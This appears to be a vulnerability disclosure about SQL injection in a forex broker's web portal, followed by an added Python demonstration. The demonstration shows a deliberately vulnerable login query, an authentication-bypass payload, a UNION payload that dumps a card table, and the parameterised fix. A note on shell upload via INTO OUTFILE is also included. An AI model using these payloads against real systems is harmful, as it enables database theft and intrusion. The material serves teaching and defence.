The zSecure team has recently discovered a critical SQL injection vulnerability in the web portal of 4XP, a leading online forex broker with a customer base of more than 1 lakh (100,000). Financial transactions, including but not limited to credit card transactions, are carried out on the broker's platform daily. The vulnerability allows complete access to the broker's database, which could be misused to obtain customers' confidential information, including their login IDs, passwords, home addresses, email IDs, mobile numbers, credit card details, etc. This critical vulnerability could prove devastating to the company if it is not fixed as soon as possible. Below are the details about the company and the discovered vulnerability.
About the Company
4XP is an online forex broker that specializes in providing an all-inclusive trading package backed by a caring and devoted support team. 4XP was founded by a group of retail-ended entrepreneurs and capital market dealers sharing a vision for creating a customer-oriented brokerage service that would provide a compelling trading solution. 4XP strives toward creating the most professional and transparent trading environment possible.
Vulnerability Type: Hidden SQL Injection Vulnerability
Database Type: MySQL
Alert Level: Critical
Threats: Complete Database Access, Database Dump, Shell Uploading
Worst case scenarios
A skilled and malicious black hat could mount far more devastating attacks using this critical flaw, such as:
- Uninterrupted access to the database
- A full database dump
- Possible shell upload, which could result in defacement of the website
- Much more . . .
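As an added illustration, which is not part of zSecure's advisory and not 4XP's code, the following Python example shows the pattern behind the threats listed above: a login query that splices user input straight into SQL, the two payloads an attacker would send against it (one to bypass authentication, one to pull rows out of an unrelated table, which is what "complete database access" means in practice), and the parameterised query that closes the hole. The database, table names and sample rows are constructed for this example, and sqlite3 stands in for MySQL so that it runs offline.

```python
import sqlite3

# Constructed sample data standing in for the broker's MySQL database.
# Plaintext passwords and raw card numbers are deliberately unrealistic;
# they only make the dumped rows easy to recognise.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT, email TEXT);
CREATE TABLE cards (id INTEGER PRIMARY KEY, user_id INTEGER, number TEXT);
INSERT INTO users VALUES (1, 'alice', 's3cret',  'alice@example.com');
INSERT INTO users VALUES (2, 'bob',   'hunter2', 'bob@example.com');
INSERT INTO cards VALUES (1, 1, '4111111111111111');
INSERT INTO cards VALUES (2, 2, '5500000000000004');
"""


def fresh_db():
    """Return an in-memory database populated with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, login, password):
    """The flawed pattern: user-controlled strings are pasted into the query text,
    so a quote in the input ends the literal and the rest is parsed as SQL."""
    sql = (
        "SELECT id, login, email FROM users "
        "WHERE login = '%s' AND password = '%s'" % (login, password)
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, login, password):
    """The fix: placeholders. The driver sends values separately from the SQL text,
    so quotes and keywords in the input are data, never syntax."""
    sql = "SELECT id, login, email FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (login, password)).fetchall()


# Payload 1, sent as the password. The WHERE clause becomes
#   login = 'alice' AND password = '' OR '1'='1'
# and AND binds tighter than OR, so every row matches: authentication bypass.
BYPASS = "' OR '1'='1"

# Payload 2, sent as the login. It closes the literal, appends a UNION with the
# same column count, and comments out the rest of the original query, so the
# result set is filled from a table the login form was never meant to read.
UNION_DUMP = "x' UNION SELECT id, number, user_id FROM cards -- "


def dump_cards_via_union(conn):
    """Use the UNION payload against the vulnerable login to read the cards table.
    Returns the set of card numbers obtained, i.e. the 'database dump' threat."""
    rows = login_vulnerable(conn, UNION_DUMP, "anything")
    return {row[1] for row in rows}


if __name__ == "__main__":
    db = fresh_db()
    print("vulnerable, bypass payload:", login_vulnerable(db, "alice", BYPASS))
    print("vulnerable, union payload: ", dump_cards_via_union(db))
    print("safe, bypass payload:      ", login_safe(db, "alice", BYPASS))
    print("safe, real credentials:    ", login_safe(db, "alice", "s3cret"))
```

The same two queries against MySQL behave identically; the only driver-level difference is that mysqlclient and PyMySQL use `%s` as the placeholder rather than sqlite3's `?`. The third threat on the list, shell upload, is reached from an injection like this when the application's MySQL account holds the FILE privilege and the web root is writable by the database server, because `SELECT ... INTO OUTFILE` can then write an attacker-chosen file under the document root; restricting that privilege and parameterising every query are the two controls that matter.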
Proof of vulnerability